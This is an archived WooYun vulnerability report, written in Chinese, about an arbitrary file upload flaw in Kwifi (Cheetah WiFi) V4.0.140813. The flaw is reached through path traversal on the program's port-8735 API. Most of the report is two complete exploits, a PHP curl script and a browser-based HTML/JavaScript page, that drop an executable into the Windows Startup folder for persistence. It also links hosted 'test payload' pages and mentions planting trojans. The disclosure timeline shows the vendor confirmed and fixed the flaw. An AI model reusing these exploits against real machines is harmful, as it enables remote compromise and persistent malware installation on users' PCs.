乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-14: 细节已通知厂商并且等待厂商处理中 2014-08-14: 厂商已经确认,细节仅向厂商公开 2014-10-08: 细节向核心白帽子及相关领域专家公开 2014-10-18: 细节向普通白帽子公开 2014-10-28: 细节向实习白帽子公开 2014-11-12: 厂商已经修复漏洞并主动公开,细节向公众公开
闪电有没有?
漏洞程序:Kwifi V4.0.140813 猎豹wifi最新版本测试环境:Windows 7 64bitKwifi V4.0.140813Firefox 31.0Chrome 36.0.1985.143 m漏洞详情:当猎豹wifi运行后会向外网开放8735端口(运行web),而其某接口存在漏洞导致任意文件上传,从而导致pc机沦陷。http://target:8735/tool/#uploadhttp://target:8735/api/replypic 存在漏洞导致任意文件上传漏洞危害:默认装C盘 可以实现挂马,指定入侵,拓展大企业内网监控pc机等;部分测试环境默认安装在D盘(wooyun工作人员测试时出现,我测试时无论是官网最新版本还是百度下载的猎豹wifi都装在C盘);
当kwifi外网环境时:
<?php /** * Created by itleaf * Date: 2014-08-14 * Name: Kwifi V4.0.140813 Remote File Upload Exploit * Blog: http://itleaf.duapp.com **/function getIP(){ if (isset($_SERVER)) { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $realip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) { $realip = $_SERVER['HTTP_CLIENT_IP']; } else { $realip = $_SERVER['REMOTE_ADDR']; } } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $realip = getenv( "HTTP_X_FORWARDED_FOR"); } elseif (getenv("HTTP_CLIENT_IP")) { $realip = getenv("HTTP_CLIENT_IP"); } else { $realip = getenv("REMOTE_ADDR"); } } return $realip;} $ip=$_GET["ip"]; $ch = curl_init(); $post=array('filename' => '@'.realpath('cmd.exe')); //POST提交内容 $url = "http://".$ip.":8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088"; //上传地址 // $url = "http://".getIP()":8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088"; //上传地址 curl_setopt($ch, CURLOPT_URL, $url);//URL curl_setopt($ch, CURLOPT_REFERER, "http://".$ip.":8735/tool/"); curl_setopt($ch, CURLOPT_POST, 1); //模拟POST curl_setopt($ch, CURLOPT_POSTFIELDS, $post);//POST内容 curl_exec($ch); curl_close($ch); //echo getIP();?>
当kwifi为内网环境时:firefox 和google chrome下有效
<!DOCTYPE html> <html> <head> <title>Kwifi Remote File Upload Exploit</title> <meta charset=utf-8 /> <link href='css.css' rel='stylesheet' type='text/css'> <script src="jquery.min.js" type="text/javascript"></script> <style> body {background: #333; color: #eee; font-family: 'Inconsolata', Verdana, sans-serif;} a:link {color: green; } a:visited {color: darkgreen;} </style> </head> <body> <h1>Kwifi V4.0.140813 Remote File Upload Exploit</h1> <!-- <h2>Step 2</h2> <button type="button" id="upload" onclick="start()"><font size="+2">Let's have some fun!</font></button> --> <script> var logUrl = 'http://192.168.1.103:8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088'; function byteValue(x) { return x.charCodeAt(0) & 0xff; } function toBytes(datastr) { var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); return ui8a.buffer; } if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { this.send(toBytes(datastr)); } } function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "9849436581144108930470211272", uri = logUrl, xhr = new XMLHttpRequest(); var fileFieldName = "filedata"; xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); // simulate a file MIME POST request. xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; xhr.onreadystatechange = function() { if (xhr.readyState == 4) { if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) { if (xhr.responseText != "") { alert(JSON.parse(xhr.responseText).msg); // display response. } } else if (xhr.status == 0) { $("#goto").show(); } } } var body = ""; body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.sendAsBinary(body); return true; } function addField(name, value, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n"; c += value + "\r\n"; return c; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n"; c += "Content-Type: application/octet-stream\r\n\r\n"; c += value + "\r\n"; return c; } function load_binary_resource(url) { var req = new XMLHttpRequest(); req.open('GET', url, false); //XHR binary charset opt by Marcus Granado 2006 [http://mgran.blogspot.com] req.overrideMimeType('text/plain; charset=x-user-defined'); req.send(null); if (req.status != 200) return ''; var bytes = Array.prototype.map.call(req.responseText, byteValue); try{ return String.fromCharCode.apply(this,bytes); }catch(e){ return req.responseText; } } var start = function() { var c = load_binary_resource('cmd.exe'); fileUpload(c, 'cmd.exe'); }; start(); </script> </div> <div id="goto" style="display:none"> <h2>Well Done</h2> </div> </body> </html>
视频:http://qin1u.qiniudn.com/kwifi.wmv演示个cmd,上马过金山等也是可以的~下面给一个通用型测试payload:若安装到c盘,则开启wifi后访问下述链接,安装cmd.exe程序到系统启动项http://xssae.sinaapp.com/kwifi/2.html若安装到d盘,则开启wifi后访问下述链接,安装cmd.exe程序到d盘根目录http://xssae.sinaapp.com/kwifi/3.html
危害等级:高
漏洞Rank:15
确认时间:2014-08-14 19:53
非常感谢您的提交
2014-11-12:已经修复
2014-11-12:漏洞已修复